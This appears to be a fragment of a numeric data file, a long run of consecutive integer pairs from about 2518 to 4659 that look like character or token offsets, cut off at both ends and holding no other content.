[2518,2519],[2519,2520],[2520,2521],[2521,2522],[2522,2523],[2523,2524],[2524,2525],[2525,2526],[2526,2527],[2527,2528],[2528,2529],[2529,2530],[2530,2531],[2531,2532],[2532,2533],[2533,2534],[2534,2535],[2535,2536],[2536,2537],[2537,2538],[2538,2539],[2539,2540],[2540,2541],[2541,2542],[2542,2543],[2543,2544],[2544,2545],[2545,2546],[2546,2547],[2547,2548],[2548,2549],[2549,2550],[2550,2551],[2551,2552],[2552,2553],[2553,2554],[2554,2555],[2555,2556],[2556,2557],[2557,2558],[2558,2559],[2559,2560],[2560,2561],[2561,2562],[2562,2563],[2563,2564],[2564,2565],[2565,2566],[2566,2567],[2567,2568],[2568,2569],[2569,2570],[2570,2571],[2571,2572],[2572,2573],[2573,2574],[2574,2575],[2575,2576],[2576,2577],[2577,2578],[2578,2579],[2579,2580],[2580,2581],[2581,2582],[2582,2583],[2583,2584],[2584,2585],[2585,2586],[2586,2587],[2587,2588],[2588,2589],[2589,2590],[2590,2591],[2591,2592],[2592,2593],[2593,2594],[2594,2595],[2595,2596],[2596,2597],[2597,2598],[2598,2599],[2599,2600],[2600,2601],[2601,2602],[2602,2603],[2603,2604],[2604,2605],[2605,2606],[2606,2607],[2607,2608],[2608,2609],[2609,2610],[2610,2611],[2611,2612],[2612,2613],[2613,2614],[2614,2615],[2615,2616],[2616,2617],[2617,2618],[2618,2619],[2619,2620],[2620,2621],[2621,2622],[2622,2623],[2623,2624],[2624,2625],[2625,2626],[2626,2627],[2627,2628],[2628,2629],[2629,2630],[2630,2631],[2631,2632],[2632,2633],[2633,2634],[2634,2635],[2635,2636],[2636,2637],[2637,2638],[2638,2639],[2639,2640],[2640,2641],[2641,2642],[2642,2643],[2643,2644],[2644,2645],[2645,2646],[2646,2647],[2647,2648],[2648,2649],[2649,2650],[2650,2651],[2651,2652],[2652,2653],[2653,2654],[2654,2655],[2655,2656],[2656,2657],[2657,2658],[2658,2659],[2659,2660],[2660,2661],[2661,2662],[2662,2663],[2663,2664],[2664,2665],[2665,2666],[2666,2667],[2667,2668],[2668,2669],[2669,2670],[2670,2671],[2671,2672],[2672,2673],[2673,2674],[2674,2675],[2675,2676],[2676,2677],[2677,2678],[2678,2679],[2679,2680],[2680,2681],[2681,2682],[2682,2683],[2683,2684],[2684,26
85],[2685,2686],[2686,2687],[2687,2688],[2688,2689],[2689,2690],[2690,2691],[2691,2692],[2692,2693],[2693,2694],[2694,2695],[2695,2696],[2696,2697],[2697,2698],[2698,2699],[2699,2700],[2700,2701],[2701,2702],[2702,2703],[2703,2704],[2704,2705],[2705,2706],[2706,2707],[2707,2708],[2708,2709],[2709,2710],[2710,2711],[2711,2712],[2712,2713],[2713,2714],[2714,2715],[2715,2716],[2716,2717],[2717,2718],[2718,2719],[2719,2720],[2720,2721],[2721,2722],[2722,2723],[2723,2724],[2724,2725],[2725,2726],[2726,2727],[2727,2728],[2728,2729],[2729,2730],[2730,2731],[2731,2732],[2732,2733],[2733,2734],[2734,2735],[2735,2736],[2736,2737],[2737,2738],[2738,2739],[2739,2740],[2740,2741],[2741,2742],[2742,2743],[2743,2744],[2744,2745],[2745,2746],[2746,2747],[2747,2748],[2748,2749],[2749,2750],[2750,2751],[2751,2752],[2752,2753],[2753,2754],[2754,2755],[2755,2756],[2756,2757],[2757,2758],[2758,2759],[2759,2760],[2760,2761],[2761,2762],[2762,2763],[2763,2764],[2764,2765],[2765,2766],[2766,2767],[2767,2768],[2768,2769],[2769,2770],[2770,2771],[2771,2772],[2772,2773],[2773,2774],[2774,2775],[2775,2776],[2776,2777],[2777,2778],[2778,2779],[2779,2780],[2780,2781],[2781,2782],[2782,2783],[2783,2784],[2784,2785],[2785,2786],[2786,2787],[2787,2788],[2788,2789],[2789,2790],[2790,2791],[2791,2792],[2792,2793],[2793,2794],[2794,2795],[2795,2796],[2796,2797],[2797,2798],[2798,2799],[2799,2800],[2800,2801],[2801,2802],[2802,2803],[2803,2804],[2804,2805],[2805,2806],[2806,2807],[2807,2808],[2808,2809],[2809,2810],[2810,2811],[2811,2812],[2812,2813],[2813,2814],[2814,2815],[2815,2816],[2816,2817],[2817,2818],[2818,2819],[2819,2820],[2820,2821],[2821,2822],[2822,2823],[2823,2824],[2824,2825],[2825,2826],[2826,2827],[2827,2828],[2828,2829],[2829,2830],[2830,2831],[2831,2832],[2832,2833],[2833,2834],[2834,2835],[2835,2836],[2836,2837],[2837,2838],[2838,2839],[2839,2840],[2840,2841],[2841,2842],[2842,2843],[2843,2844],[2844,2845],[2845,2846],[2846,2847],[2847,2848],[2848,2849],[2849,2850],[2850,2851],[285
1,2852],[2852,2853],[2853,2854],[2854,2855],[2855,2856],[2856,2857],[2857,2858],[2858,2859],[2859,2860],[2860,2861],[2861,2862],[2862,2863],[2863,2864],[2864,2865],[2865,2866],[2866,2867],[2867,2868],[2868,2869],[2869,2870],[2870,2871],[2871,2872],[2872,2873],[2873,2874],[2874,2875],[2875,2876],[2876,2877],[2877,2878],[2878,2879],[2879,2880],[2880,2881],[2881,2882],[2882,2883],[2883,2884],[2884,2885],[2885,2886],[2886,2887],[2887,2888],[2888,2889],[2889,2890],[2890,2891],[2891,2892],[2892,2893],[2893,2894],[2894,2895],[2895,2896],[2896,2897],[2897,2898],[2898,2899],[2899,2900],[2900,2901],[2901,2902],[2902,2903],[2903,2904],[2904,2905],[2905,2906],[2906,2907],[2907,2908],[2908,2909],[2909,2910],[2910,2911],[2911,2912],[2912,2913],[2913,2914],[2914,2915],[2915,2916],[2916,2917],[2917,2918],[2918,2919],[2919,2920],[2920,2921],[2921,2922],[2922,2923],[2923,2924],[2924,2925],[2925,2926],[2926,2927],[2927,2928],[2928,2929],[2929,2930],[2930,2931],[2931,2932],[2932,2933],[2933,2934],[2934,2935],[2935,2936],[2936,2937],[2937,2938],[2938,2939],[2939,2940],[2940,2941],[2941,2942],[2942,2943],[2943,2944],[2944,2945],[2945,2946],[2946,2947],[2947,2948],[2948,2949],[2949,2950],[2950,2951],[2951,2952],[2952,2953],[2953,2954],[2954,2955],[2955,2956],[2956,2957],[2957,2958],[2958,2959],[2959,2960],[2960,2961],[2961,2962],[2962,2963],[2963,2964],[2964,2965],[2965,2966],[2966,2967],[2967,2968],[2968,2969],[2969,2970],[2970,2971],[2971,2972],[2972,2973],[2973,2974],[2974,2975],[2975,2976],[2976,2977],[2977,2978],[2978,2979],[2979,2980],[2980,2981],[2981,2982],[2982,2983],[2983,2984],[2984,2985],[2985,2986],[2986,2987],[2987,2988],[2988,2989],[2989,2990],[2990,2991],[2991,2992],[2992,2993],[2993,2994],[2994,2995],[2995,2996],[2996,2997],[2997,2998],[2998,2999],[2999,3000],[3000,3001],[3001,3002],[3002,3003],[3003,3004],[3004,3005],[3005,3006],[3006,3007],[3007,3008],[3008,3009],[3009,3010],[3010,3011],[3011,3012],[3012,3013],[3013,3014],[3014,3015],[3015,3016],[3016,3017],[3017,3018],
[3018,3019],[3019,3020],[3020,3021],[3021,3022],[3022,3023],[3023,3024],[3024,3025],[3025,3026],[3026,3027],[3027,3028],[3028,3029],[3029,3030],[3030,3031],[3031,3032],[3032,3033],[3033,3034],[3034,3035],[3035,3036],[3036,3037],[3037,3038],[3038,3039],[3039,3040],[3040,3041],[3041,3042],[3042,3043],[3043,3044],[3044,3045],[3045,3046],[3046,3047],[3047,3048],[3048,3049],[3049,3050],[3050,3051],[3051,3052],[3052,3053],[3053,3054],[3054,3055],[3055,3056],[3056,3057],[3057,3058],[3058,3059],[3059,3060],[3060,3061],[3061,3062],[3062,3063],[3063,3064],[3064,3065],[3065,3066],[3066,3067],[3067,3068],[3068,3069],[3069,3070],[3070,3071],[3071,3072],[3072,3073],[3073,3074],[3074,3075],[3075,3076],[3076,3077],[3077,3078],[3078,3079],[3079,3080],[3080,3081],[3081,3082],[3082,3083],[3083,3084],[3084,3085],[3085,3086],[3086,3087],[3087,3088],[3088,3089],[3089,3090],[3090,3091],[3091,3092],[3092,3093],[3093,3094],[3094,3095],[3095,3096],[3096,3097],[3097,3098],[3098,3099],[3099,3100],[3100,3101],[3101,3102],[3102,3103],[3103,3104],[3104,3105],[3105,3106],[3106,3107],[3107,3108],[3108,3109],[3109,3110],[3110,3111],[3111,3112],[3112,3113],[3113,3114],[3114,3115],[3115,3116],[3116,3117],[3117,3118],[3118,3119],[3119,3120],[3120,3121],[3121,3122],[3122,3123],[3123,3124],[3124,3125],[3125,3126],[3126,3127],[3127,3128],[3128,3129],[3129,3130],[3130,3131],[3131,3132],[3132,3133],[3133,3134],[3134,3135],[3135,3136],[3136,3137],[3137,3138],[3138,3139],[3139,3140],[3140,3141],[3141,3142],[3142,3143],[3143,3144],[3144,3145],[3145,3146],[3146,3147],[3147,3148],[3148,3149],[3149,3150],[3150,3151],[3151,3152],[3152,3153],[3153,3154],[3154,3155],[3155,3156],[3156,3157],[3157,3158],[3158,3159],[3159,3160],[3160,3161],[3161,3162],[3162,3163],[3163,3164],[3164,3165],[3165,3166],[3166,3167],[3167,3168],[3168,3169],[3169,3170],[3170,3171],[3171,3172],[3172,3173],[3173,3174],[3174,3175],[3175,3176],[3176,3177],[3177,3178],[3178,3179],[3179,3180],[3180,3181],[3181,3182],[3182,3183],[3183,3184],[3184,31
85],[3185,3186],[3186,3187],[3187,3188],[3188,3189],[3189,3190],[3190,3191],[3191,3192],[3192,3193],[3193,3194],[3194,3195],[3195,3196],[3196,3197],[3197,3198],[3198,3199],[3199,3200],[3200,3201],[3201,3202],[3202,3203],[3203,3204],[3204,3205],[3205,3206],[3206,3207],[3207,3208],[3208,3209],[3209,3210],[3210,3211],[3211,3212],[3212,3213],[3213,3214],[3214,3215],[3215,3216],[3216,3217],[3217,3218],[3218,3219],[3219,3220],[3220,3221],[3221,3222],[3222,3223],[3223,3224],[3224,3225],[3225,3226],[3226,3227],[3227,3228],[3228,3229],[3229,3230],[3230,3231],[3231,3232],[3232,3233],[3233,3234],[3234,3235],[3235,3236],[3236,3237],[3237,3238],[3238,3239],[3239,3240],[3240,3241],[3241,3242],[3242,3243],[3243,3244],[3244,3245],[3245,3246],[3246,3247],[3247,3248],[3248,3249],[3249,3250],[3250,3251],[3251,3252],[3252,3253],[3253,3254],[3254,3255],[3255,3256],[3256,3257],[3257,3258],[3258,3259],[3259,3260],[3260,3261],[3261,3262],[3262,3263],[3263,3264],[3264,3265],[3265,3266],[3266,3267],[3267,3268],[3268,3269],[3269,3270],[3270,3271],[3271,3272],[3272,3273],[3273,3274],[3274,3275],[3275,3276],[3276,3277],[3277,3278],[3278,3279],[3279,3280],[3280,3281],[3281,3282],[3282,3283],[3283,3284],[3284,3285],[3285,3286],[3286,3287],[3287,3288],[3288,3289],[3289,3290],[3290,3291],[3291,3292],[3292,3293],[3293,3294],[3294,3295],[3295,3296],[3296,3297],[3297,3298],[3298,3299],[3299,3300],[3300,3301],[3301,3302],[3302,3303],[3303,3304],[3304,3305],[3305,3306],[3306,3307],[3307,3308],[3308,3309],[3309,3310],[3310,3311],[3311,3312],[3312,3313],[3313,3314],[3314,3315],[3315,3316],[3316,3317],[3317,3318],[3318,3319],[3319,3320],[3320,3321],[3321,3322],[3322,3323],[3323,3324],[3324,3325],[3325,3326],[3326,3327],[3327,3328],[3328,3329],[3329,3330],[3330,3331],[3331,3332],[3332,3333],[3333,3334],[3334,3335],[3335,3336],[3336,3337],[3337,3338],[3338,3339],[3339,3340],[3340,3341],[3341,3342],[3342,3343],[3343,3344],[3344,3345],[3345,3346],[3346,3347],[3347,3348],[3348,3349],[3349,3350],[3350,3351],[335
1,3352],[3352,3353],[3353,3354],[3354,3355],[3355,3356],[3356,3357],[3357,3358],[3358,3359],[3359,3360],[3360,3361],[3361,3362],[3362,3363],[3363,3364],[3364,3365],[3365,3366],[3366,3367],[3367,3368],[3368,3369],[3369,3370],[3370,3371],[3371,3372],[3372,3373],[3373,3374],[3374,3375],[3375,3376],[3376,3377],[3377,3378],[3378,3379],[3379,3380],[3380,3381],[3381,3382],[3382,3383],[3383,3384],[3384,3385],[3385,3386],[3386,3387],[3387,3388],[3388,3389],[3389,3390],[3390,3391],[3391,3392],[3392,3393],[3393,3394],[3394,3395],[3395,3396],[3396,3397],[3397,3398],[3398,3399],[3399,3400],[3400,3401],[3401,3402],[3402,3403],[3403,3404],[3404,3405],[3405,3406],[3406,3407],[3407,3408],[3408,3409],[3409,3410],[3410,3411],[3411,3412],[3412,3413],[3413,3414],[3414,3415],[3415,3416],[3416,3417],[3417,3418],[3418,3419],[3419,3420],[3420,3421],[3421,3422],[3422,3423],[3423,3424],[3424,3425],[3425,3426],[3426,3427],[3427,3428],[3428,3429],[3429,3430],[3430,3431],[3431,3432],[3432,3433],[3433,3434],[3434,3435],[3435,3436],[3436,3437],[3437,3438],[3438,3439],[3439,3440],[3440,3441],[3441,3442],[3442,3443],[3443,3444],[3444,3445],[3445,3446],[3446,3447],[3447,3448],[3448,3449],[3449,3450],[3450,3451],[3451,3452],[3452,3453],[3453,3454],[3454,3455],[3455,3456],[3456,3457],[3457,3458],[3458,3459],[3459,3460],[3460,3461],[3461,3462],[3462,3463],[3463,3464],[3464,3465],[3465,3466],[3466,3467],[3467,3468],[3468,3469],[3469,3470],[3470,3471],[3471,3472],[3472,3473],[3473,3474],[3474,3475],[3475,3476],[3476,3477],[3477,3478],[3478,3479],[3479,3480],[3480,3481],[3481,3482],[3482,3483],[3483,3484],[3484,3485],[3485,3486],[3486,3487],[3487,3488],[3488,3489],[3489,3490],[3490,3491],[3491,3492],[3492,3493],[3493,3494],[3494,3495],[3495,3496],[3496,3497],[3497,3498],[3498,3499],[3499,3500],[3500,3501],[3501,3502],[3502,3503],[3503,3504],[3504,3505],[3505,3506],[3506,3507],[3507,3508],[3508,3509],[3509,3510],[3510,3511],[3511,3512],[3512,3513],[3513,3514],[3514,3515],[3515,3516],[3516,3517],[3517,3518],
[3518,3519],[3519,3520],[3520,3521],[3521,3522],[3522,3523],[3523,3524],[3524,3525],[3525,3526],[3526,3527],[3527,3528],[3528,3529],[3529,3530],[3530,3531],[3531,3532],[3532,3533],[3533,3534],[3534,3535],[3535,3536],[3536,3537],[3537,3538],[3538,3539],[3539,3540],[3540,3541],[3541,3542],[3542,3543],[3543,3544],[3544,3545],[3545,3546],[3546,3547],[3547,3548],[3548,3549],[3549,3550],[3550,3551],[3551,3552],[3552,3553],[3553,3554],[3554,3555],[3555,3556],[3556,3557],[3557,3558],[3558,3559],[3559,3560],[3560,3561],[3561,3562],[3562,3563],[3563,3564],[3564,3565],[3565,3566],[3566,3567],[3567,3568],[3568,3569],[3569,3570],[3570,3571],[3571,3572],[3572,3573],[3573,3574],[3574,3575],[3575,3576],[3576,3577],[3577,3578],[3578,3579],[3579,3580],[3580,3581],[3581,3582],[3582,3583],[3583,3584],[3584,3585],[3585,3586],[3586,3587],[3587,3588],[3588,3589],[3589,3590],[3590,3591],[3591,3592],[3592,3593],[3593,3594],[3594,3595],[3595,3596],[3596,3597],[3597,3598],[3598,3599],[3599,3600],[3600,3601],[3601,3602],[3602,3603],[3603,3604],[3604,3605],[3605,3606],[3606,3607],[3607,3608],[3608,3609],[3609,3610],[3610,3611],[3611,3612],[3612,3613],[3613,3614],[3614,3615],[3615,3616],[3616,3617],[3617,3618],[3618,3619],[3619,3620],[3620,3621],[3621,3622],[3622,3623],[3623,3624],[3624,3625],[3625,3626],[3626,3627],[3627,3628],[3628,3629],[3629,3630],[3630,3631],[3631,3632],[3632,3633],[3633,3634],[3634,3635],[3635,3636],[3636,3637],[3637,3638],[3638,3639],[3639,3640],[3640,3641],[3641,3642],[3642,3643],[3643,3644],[3644,3645],[3645,3646],[3646,3647],[3647,3648],[3648,3649],[3649,3650],[3650,3651],[3651,3652],[3652,3653],[3653,3654],[3654,3655],[3655,3656],[3656,3657],[3657,3658],[3658,3659],[3659,3660],[3660,3661],[3661,3662],[3662,3663],[3663,3664],[3664,3665],[3665,3666],[3666,3667],[3667,3668],[3668,3669],[3669,3670],[3670,3671],[3671,3672],[3672,3673],[3673,3674],[3674,3675],[3675,3676],[3676,3677],[3677,3678],[3678,3679],[3679,3680],[3680,3681],[3681,3682],[3682,3683],[3683,3684],[3684,36
85],[3685,3686],[3686,3687],[3687,3688],[3688,3689],[3689,3690],[3690,3691],[3691,3692],[3692,3693],[3693,3694],[3694,3695],[3695,3696],[3696,3697],[3697,3698],[3698,3699],[3699,3700],[3700,3701],[3701,3702],[3702,3703],[3703,3704],[3704,3705],[3705,3706],[3706,3707],[3707,3708],[3708,3709],[3709,3710],[3710,3711],[3711,3712],[3712,3713],[3713,3714],[3714,3715],[3715,3716],[3716,3717],[3717,3718],[3718,3719],[3719,3720],[3720,3721],[3721,3722],[3722,3723],[3723,3724],[3724,3725],[3725,3726],[3726,3727],[3727,3728],[3728,3729],[3729,3730],[3730,3731],[3731,3732],[3732,3733],[3733,3734],[3734,3735],[3735,3736],[3736,3737],[3737,3738],[3738,3739],[3739,3740],[3740,3741],[3741,3742],[3742,3743],[3743,3744],[3744,3745],[3745,3746],[3746,3747],[3747,3748],[3748,3749],[3749,3750],[3750,3751],[3751,3752],[3752,3753],[3753,3754],[3754,3755],[3755,3756],[3756,3757],[3757,3758],[3758,3759],[3759,3760],[3760,3761],[3761,3762],[3762,3763],[3763,3764],[3764,3765],[3765,3766],[3766,3767],[3767,3768],[3768,3769],[3769,3770],[3770,3771],[3771,3772],[3772,3773],[3773,3774],[3774,3775],[3775,3776],[3776,3777],[3777,3778],[3778,3779],[3779,3780],[3780,3781],[3781,3782],[3782,3783],[3783,3784],[3784,3785],[3785,3786],[3786,3787],[3787,3788],[3788,3789],[3789,3790],[3790,3791],[3791,3792],[3792,3793],[3793,3794],[3794,3795],[3795,3796],[3796,3797],[3797,3798],[3798,3799],[3799,3800],[3800,3801],[3801,3802],[3802,3803],[3803,3804],[3804,3805],[3805,3806],[3806,3807],[3807,3808],[3808,3809],[3809,3810],[3810,3811],[3811,3812],[3812,3813],[3813,3814],[3814,3815],[3815,3816],[3816,3817],[3817,3818],[3818,3819],[3819,3820],[3820,3821],[3821,3822],[3822,3823],[3823,3824],[3824,3825],[3825,3826],[3826,3827],[3827,3828],[3828,3829],[3829,3830],[3830,3831],[3831,3832],[3832,3833],[3833,3834],[3834,3835],[3835,3836],[3836,3837],[3837,3838],[3838,3839],[3839,3840],[3840,3841],[3841,3842],[3842,3843],[3843,3844],[3844,3845],[3845,3846],[3846,3847],[3847,3848],[3848,3849],[3849,3850],[3850,3851],[385
1,3852],[3852,3853],[3853,3854],[3854,3855],[3855,3856],[3856,3857],[3857,3858],[3858,3859],[3859,3860],[3860,3861],[3861,3862],[3862,3863],[3863,3864],[3864,3865],[3865,3866],[3866,3867],[3867,3868],[3868,3869],[3869,3870],[3870,3871],[3871,3872],[3872,3873],[3873,3874],[3874,3875],[3875,3876],[3876,3877],[3877,3878],[3878,3879],[3879,3880],[3880,3881],[3881,3882],[3882,3883],[3883,3884],[3884,3885],[3885,3886],[3886,3887],[3887,3888],[3888,3889],[3889,3890],[3890,3891],[3891,3892],[3892,3893],[3893,3894],[3894,3895],[3895,3896],[3896,3897],[3897,3898],[3898,3899],[3899,3900],[3900,3901],[3901,3902],[3902,3903],[3903,3904],[3904,3905],[3905,3906],[3906,3907],[3907,3908],[3908,3909],[3909,3910],[3910,3911],[3911,3912],[3912,3913],[3913,3914],[3914,3915],[3915,3916],[3916,3917],[3917,3918],[3918,3919],[3919,3920],[3920,3921],[3921,3922],[3922,3923],[3923,3924],[3924,3925],[3925,3926],[3926,3927],[3927,3928],[3928,3929],[3929,3930],[3930,3931],[3931,3932],[3932,3933],[3933,3934],[3934,3935],[3935,3936],[3936,3937],[3937,3938],[3938,3939],[3939,3940],[3940,3941],[3941,3942],[3942,3943],[3943,3944],[3944,3945],[3945,3946],[3946,3947],[3947,3948],[3948,3949],[3949,3950],[3950,3951],[3951,3952],[3952,3953],[3953,3954],[3954,3955],[3955,3956],[3956,3957],[3957,3958],[3958,3959],[3959,3960],[3960,3961],[3961,3962],[3962,3963],[3963,3964],[3964,3965],[3965,3966],[3966,3967],[3967,3968],[3968,3969],[3969,3970],[3970,3971],[3971,3972],[3972,3973],[3973,3974],[3974,3975],[3975,3976],[3976,3977],[3977,3978],[3978,3979],[3979,3980],[3980,3981],[3981,3982],[3982,3983],[3983,3984],[3984,3985],[3985,3986],[3986,3987],[3987,3988],[3988,3989],[3989,3990],[3990,3991],[3991,3992],[3992,3993],[3993,3994],[3994,3995],[3995,3996],[3996,3997],[3997,3998],[3998,3999],[3999,4000],[4000,4001],[4001,4002],[4002,4003],[4003,4004],[4004,4005],[4005,4006],[4006,4007],[4007,4008],[4008,4009],[4009,4010],[4010,4011],[4011,4012],[4012,4013],[4013,4014],[4014,4015],[4015,4016],[4016,4017],[4017,4018],
[4018,4019],[4019,4020],[4020,4021],[4021,4022],[4022,4023],[4023,4024],[4024,4025],[4025,4026],[4026,4027],[4027,4028],[4028,4029],[4029,4030],[4030,4031],[4031,4032],[4032,4033],[4033,4034],[4034,4035],[4035,4036],[4036,4037],[4037,4038],[4038,4039],[4039,4040],[4040,4041],[4041,4042],[4042,4043],[4043,4044],[4044,4045],[4045,4046],[4046,4047],[4047,4048],[4048,4049],[4049,4050],[4050,4051],[4051,4052],[4052,4053],[4053,4054],[4054,4055],[4055,4056],[4056,4057],[4057,4058],[4058,4059],[4059,4060],[4060,4061],[4061,4062],[4062,4063],[4063,4064],[4064,4065],[4065,4066],[4066,4067],[4067,4068],[4068,4069],[4069,4070],[4070,4071],[4071,4072],[4072,4073],[4073,4074],[4074,4075],[4075,4076],[4076,4077],[4077,4078],[4078,4079],[4079,4080],[4080,4081],[4081,4082],[4082,4083],[4083,4084],[4084,4085],[4085,4086],[4086,4087],[4087,4088],[4088,4089],[4089,4090],[4090,4091],[4091,4092],[4092,4093],[4093,4094],[4094,4095],[4095,4096],[4096,4097],[4097,4098],[4098,4099],[4099,4100],[4100,4101],[4101,4102],[4102,4103],[4103,4104],[4104,4105],[4105,4106],[4106,4107],[4107,4108],[4108,4109],[4109,4110],[4110,4111],[4111,4112],[4112,4113],[4113,4114],[4114,4115],[4115,4116],[4116,4117],[4117,4118],[4118,4119],[4119,4120],[4120,4121],[4121,4122],[4122,4123],[4123,4124],[4124,4125],[4125,4126],[4126,4127],[4127,4128],[4128,4129],[4129,4130],[4130,4131],[4131,4132],[4132,4133],[4133,4134],[4134,4135],[4135,4136],[4136,4137],[4137,4138],[4138,4139],[4139,4140],[4140,4141],[4141,4142],[4142,4143],[4143,4144],[4144,4145],[4145,4146],[4146,4147],[4147,4148],[4148,4149],[4149,4150],[4150,4151],[4151,4152],[4152,4153],[4153,4154],[4154,4155],[4155,4156],[4156,4157],[4157,4158],[4158,4159],[4159,4160],[4160,4161],[4161,4162],[4162,4163],[4163,4164],[4164,4165],[4165,4166],[4166,4167],[4167,4168],[4168,4169],[4169,4170],[4170,4171],[4171,4172],[4172,4173],[4173,4174],[4174,4175],[4175,4176],[4176,4177],[4177,4178],[4178,4179],[4179,4180],[4180,4181],[4181,4182],[4182,4183],[4183,4184],[4184,41
85],[4185,4186],[4186,4187],[4187,4188],[4188,4189],[4189,4190],[4190,4191],[4191,4192],[4192,4193],[4193,4194],[4194,4195],[4195,4196],[4196,4197],[4197,4198],[4198,4199],[4199,4200],[4200,4201],[4201,4202],[4202,4203],[4203,4204],[4204,4205],[4205,4206],[4206,4207],[4207,4208],[4208,4209],[4209,4210],[4210,4211],[4211,4212],[4212,4213],[4213,4214],[4214,4215],[4215,4216],[4216,4217],[4217,4218],[4218,4219],[4219,4220],[4220,4221],[4221,4222],[4222,4223],[4223,4224],[4224,4225],[4225,4226],[4226,4227],[4227,4228],[4228,4229],[4229,4230],[4230,4231],[4231,4232],[4232,4233],[4233,4234],[4234,4235],[4235,4236],[4236,4237],[4237,4238],[4238,4239],[4239,4240],[4240,4241],[4241,4242],[4242,4243],[4243,4244],[4244,4245],[4245,4246],[4246,4247],[4247,4248],[4248,4249],[4249,4250],[4250,4251],[4251,4252],[4252,4253],[4253,4254],[4254,4255],[4255,4256],[4256,4257],[4257,4258],[4258,4259],[4259,4260],[4260,4261],[4261,4262],[4262,4263],[4263,4264],[4264,4265],[4265,4266],[4266,4267],[4267,4268],[4268,4269],[4269,4270],[4270,4271],[4271,4272],[4272,4273],[4273,4274],[4274,4275],[4275,4276],[4276,4277],[4277,4278],[4278,4279],[4279,4280],[4280,4281],[4281,4282],[4282,4283],[4283,4284],[4284,4285],[4285,4286],[4286,4287],[4287,4288],[4288,4289],[4289,4290],[4290,4291],[4291,4292],[4292,4293],[4293,4294],[4294,4295],[4295,4296],[4296,4297],[4297,4298],[4298,4299],[4299,4300],[4300,4301],[4301,4302],[4302,4303],[4303,4304],[4304,4305],[4305,4306],[4306,4307],[4307,4308],[4308,4309],[4309,4310],[4310,4311],[4311,4312],[4312,4313],[4313,4314],[4314,4315],[4315,4316],[4316,4317],[4317,4318],[4318,4319],[4319,4320],[4320,4321],[4321,4322],[4322,4323],[4323,4324],[4324,4325],[4325,4326],[4326,4327],[4327,4328],[4328,4329],[4329,4330],[4330,4331],[4331,4332],[4332,4333],[4333,4334],[4334,4335],[4335,4336],[4336,4337],[4337,4338],[4338,4339],[4339,4340],[4340,4341],[4341,4342],[4342,4343],[4343,4344],[4344,4345],[4345,4346],[4346,4347],[4347,4348],[4348,4349],[4349,4350],[4350,4351],[435
1,4352],[4352,4353],[4353,4354],[4354,4355],[4355,4356],[4356,4357],[4357,4358],[4358,4359],[4359,4360],[4360,4361],[4361,4362],[4362,4363],[4363,4364],[4364,4365],[4365,4366],[4366,4367],[4367,4368],[4368,4369],[4369,4370],[4370,4371],[4371,4372],[4372,4373],[4373,4374],[4374,4375],[4375,4376],[4376,4377],[4377,4378],[4378,4379],[4379,4380],[4380,4381],[4381,4382],[4382,4383],[4383,4384],[4384,4385],[4385,4386],[4386,4387],[4387,4388],[4388,4389],[4389,4390],[4390,4391],[4391,4392],[4392,4393],[4393,4394],[4394,4395],[4395,4396],[4396,4397],[4397,4398],[4398,4399],[4399,4400],[4400,4401],[4401,4402],[4402,4403],[4403,4404],[4404,4405],[4405,4406],[4406,4407],[4407,4408],[4408,4409],[4409,4410],[4410,4411],[4411,4412],[4412,4413],[4413,4414],[4414,4415],[4415,4416],[4416,4417],[4417,4418],[4418,4419],[4419,4420],[4420,4421],[4421,4422],[4422,4423],[4423,4424],[4424,4425],[4425,4426],[4426,4427],[4427,4428],[4428,4429],[4429,4430],[4430,4431],[4431,4432],[4432,4433],[4433,4434],[4434,4435],[4435,4436],[4436,4437],[4437,4438],[4438,4439],[4439,4440],[4440,4441],[4441,4442],[4442,4443],[4443,4444],[4444,4445],[4445,4446],[4446,4447],[4447,4448],[4448,4449],[4449,4450],[4450,4451],[4451,4452],[4452,4453],[4453,4454],[4454,4455],[4455,4456],[4456,4457],[4457,4458],[4458,4459],[4459,4460],[4460,4461],[4461,4462],[4462,4463],[4463,4464],[4464,4465],[4465,4466],[4466,4467],[4467,4468],[4468,4469],[4469,4470],[4470,4471],[4471,4472],[4472,4473],[4473,4474],[4474,4475],[4475,4476],[4476,4477],[4477,4478],[4478,4479],[4479,4480],[4480,4481],[4481,4482],[4482,4483],[4483,4484],[4484,4485],[4485,4486],[4486,4487],[4487,4488],[4488,4489],[4489,4490],[4490,4491],[4491,4492],[4492,4493],[4493,4494],[4494,4495],[4495,4496],[4496,4497],[4497,4498],[4498,4499],[4499,4500],[4500,4501],[4501,4502],[4502,4503],[4503,4504],[4504,4505],[4505,4506],[4506,4507],[4507,4508],[4508,4509],[4509,4510],[4510,4511],[4511,4512],[4512,4513],[4513,4514],[4514,4515],[4515,4516],[4516,4517],[4517,4518],
[4518,4519],[4519,4520],[4520,4521],[4521,4522],[4522,4523],[4523,4524],[4524,4525],[4525,4526],[4526,4527],[4527,4528],[4528,4529],[4529,4530],[4530,4531],[4531,4532],[4532,4533],[4533,4534],[4534,4535],[4535,4536],[4536,4537],[4537,4538],[4538,4539],[4539,4540],[4540,4541],[4541,4542],[4542,4543],[4543,4544],[4544,4545],[4545,4546],[4546,4547],[4547,4548],[4548,4549],[4549,4550],[4550,4551],[4551,4552],[4552,4553],[4553,4554],[4554,4555],[4555,4556],[4556,4557],[4557,4558],[4558,4559],[4559,4560],[4560,4561],[4561,4562],[4562,4563],[4563,4564],[4564,4565],[4565,4566],[4566,4567],[4567,4568],[4568,4569],[4569,4570],[4570,4571],[4571,4572],[4572,4573],[4573,4574],[4574,4575],[4575,4576],[4576,4577],[4577,4578],[4578,4579],[4579,4580],[4580,4581],[4581,4582],[4582,4583],[4583,4584],[4584,4585],[4585,4586],[4586,4587],[4587,4588],[4588,4589],[4589,4590],[4590,4591],[4591,4592],[4592,4593],[4593,4594],[4594,4595],[4595,4596],[4596,4597],[4597,4598],[4598,4599],[4599,4600],[4600,4601],[4601,4602],[4602,4603],[4603,4604],[4604,4605],[4605,4606],[4606,4607],[4607,4608],[4608,4609],[4609,4610],[4610,4611],[4611,4612],[4612,4613],[4613,4614],[4614,4615],[4615,4616],[4616,4617],[4617,4618],[4618,4619],[4619,4620],[4620,4621],[4621,4622],[4622,4623],[4623,4624],[4624,4625],[4625,4626],[4626,4627],[4627,4628],[4628,4629],[4629,4630],[4630,4631],[4631,4632],[4632,4633],[4633,4634],[4634,4635],[4635,4636],[4636,4637],[4637,4638],[4638,4639],[4639,4640],[4640,4641],[4641,4642],[4642,4643],[4643,4644],[4644,4645],[4645,4646],[4646,4647],[4647,4648],[4648,4649],[4649,4650],[4650,4651],[4651,4652],[4652,4653],[4653,4654],[4654,4655],[4655,4656],[4656,4657],[4657,4658],[4658,4659],[